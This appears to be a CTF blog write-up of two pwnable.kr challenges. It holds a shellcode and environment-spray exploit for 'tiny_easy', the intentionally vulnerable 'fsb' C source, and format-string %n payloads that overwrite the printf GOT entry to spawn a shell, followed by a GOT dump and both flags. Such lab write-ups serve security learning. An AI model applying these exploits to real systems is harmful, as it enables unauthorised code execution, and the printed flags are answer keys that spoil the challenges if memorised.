pwnable-kr-4


1.tiny_easy

solve

from pwn import *
# Python 2 script: the "\x.." str literals below are used as raw bytes
# (under Python 3 a str would be text, not bytes).
# Six 8-byte chunks of hex-escaped machine code concatenated into one blob;
# what the code does is not visible from this listing.
shellcode  = "\xeb\x11\x5e\x31\xc9\xb1\x32\x80"
shellcode += "\x6c\x0e\xff\x01\x80\xe9\x01\x75"
shellcode += "\xf6\xeb\x05\xe8\xea\xff\xff\xff"
shellcode += "\x32\xc1\x51\x69\x30\x30\x74\x69"
shellcode += "\x69\x30\x63\x6a\x6f\x8a\xe4\x51"
shellcode += "\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"
# 8000 bytes of 0x90 (x86 NOP) in front of the shellcode.
payload = "\x90" * 8000 + shellcode
#p64(0xff9c3844)
# Environment variables named "1" .. "255" (0x01 .. 0xff), every one of them
# holding the full payload.
env = {}
for i in range(1,0x100):
    env[str(i)] = payload


# argv[0] is the 4-byte little-endian packing of 0xff9c3844 instead of a
# program name; presumably a guess at a stack address — confirm against the
# target.  Each iteration spawns ./tiny_easy and hands the terminal to the
# user; when that process ends the next one is spawned, so the loop only
# stops when the script itself is interrupted.
while True:
    io = process([p32(0xff9c3844)],executable="./tiny_easy", env=env)
    io.interactive()

flag

What a tiny task :) good job!

2.fsb

question

#include <stdio.h>
#include <alloca.h>
#include <fcntl.h>

unsigned long long key;   // 8 random bytes read from /dev/urandom in main()
char buf[100];            // format-string input read in fsb()
char buf2[100];           // key guess input read in fsb()

// Challenge body (intentionally vulnerable). Wipes the argv/envp strings,
// lets the user supply four inputs that reach printf() unmodified as the
// format string, then compares a decimal number read from stdin against the
// random global `key`; a match spawns /bin/sh via execve().
// read(), sleep(), execve() and strtoull() are used without <unistd.h> or
// <stdlib.h> being included (implicit declarations).
int fsb(char** argv, char** envp){
    char* args[]={"/bin/sh", 0};
    int i;

    // Addresses of this function's own argv/envp parameters, so that the
    // parameters themselves can be nulled once their strings are wiped.
    char*** pargv = &argv;
    char*** penvp = &envp;
        char** arg;
        char* c;
        // Overwrite every byte of every argv and envp string with '\0'.
        for(arg=argv;*arg;arg++) for(c=*arg; *c;c++) *c='\0';
        for(arg=envp;*arg;arg++) for(c=*arg; *c;c++) *c='\0';
    *pargv=0;
    *penvp=0;

    for(i=0; i<4; i++){
        printf("Give me some format strings(%d)\n", i+1);
        // Up to 100 bytes into the 100-byte global buf: no NUL terminator is
        // added (a full read leaves none), and read()'s result is unchecked.
        read(0, buf, 100);
        // The user's input is the format string itself — this is the
        // format-string bug the challenge is built around; the safe form
        // would be printf("%s", buf).
        printf(buf);
    }

    printf("Wait a sec...\n");
        sleep(3);

        printf("key : \n");
        read(0, buf2, 100);
        // Parse the guess as base-10; compared against the random key.
        unsigned long long pw = strtoull(buf2, 0, 10);
        if(pw == key){
                printf("Congratz!\n");
                execve(args[0], args, 0);
                return 0;
        }

        printf("Incorrect key \n");
    return 0;
}

// Entry point: draws an 8-byte random key from /dev/urandom, moves the stack
// pointer by a key-dependent amount, then runs fsb(). Returns 0 on every
// path, including the /dev/urandom failure.
int main(int argc, char* argv[], char** envp){

    int fd = open("/dev/urandom", O_RDONLY);
    if( fd==-1 || read(fd, &key, 8) != 8 ){
        printf("Error, tell admin\n");
        return 0;
    }
    close(fd);

    // Grow the stack frame by (key & 0x12345) bytes — at most 0x12345 — so
    // fsb()'s frame sits at an offset that depends on the random key.
    alloca(0x12345 & key);

    fsb(argv, envp); // exploit this format string bug!
    return 0;
}

## solve

fsb@ubuntu:~$ ./fsb > /dev/null
%134520836c%14$n
%134514347c%20$n
cat flag>&0

Modified GOT (.got.plt):

gdb-peda$ got

GOT protection: Partial RELRO | GOT functions: 10

[0x804a000] read@GLIBC_2.0 -> 0xf7610b00 (read) ◂— cmp    dword ptr gs:[0xc], 0
[0x804a004] printf@GLIBC_2.0 -> 0x80486ab (fsb+375) ◂— mov    eax, dword ptr [ebp - 0x24]
[0x804a008] sleep@GLIBC_2.0 -> 0x8048406 (sleep@plt+6) ◂— push   0x10
[0x804a00c] puts@GLIBC_2.0 -> 0x8048416 (puts@plt+6) ◂— push   0x18
[0x804a010] __gmon_start__ -> 0x8048426 (__gmon_start__@plt+6) ◂— push   0x20 /* 'h ' */
[0x804a014] open@GLIBC_2.0 -> 0xf76106f0 (open) ◂— cmp    dword ptr gs:[0xc], 0
[0x804a018] __libc_start_main@GLIBC_2.0 -> 0xf7553540 (__libc_start_main) ◂— call   0xf765ab59
[0x804a01c] execve@GLIBC_2.0 -> 0x8048456 (execve@plt+6) ◂— push   0x38 /* 'h8' */
[0x804a020] strtoull@GLIBC_2.0 -> 0x8048466 (strtoull@plt+6) ◂— push   0x40 /* 'h@' */
[0x804a024] close@GLIBC_2.0 -> 0xf7611290 (close) ◂— cmp    dword ptr gs:[0xc], 0

flag

Have you ever saw an example of utilizing [n] format character?? :(

文章作者: xyzz
文章链接: http://www.xyzzpwn.top
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 xyzz !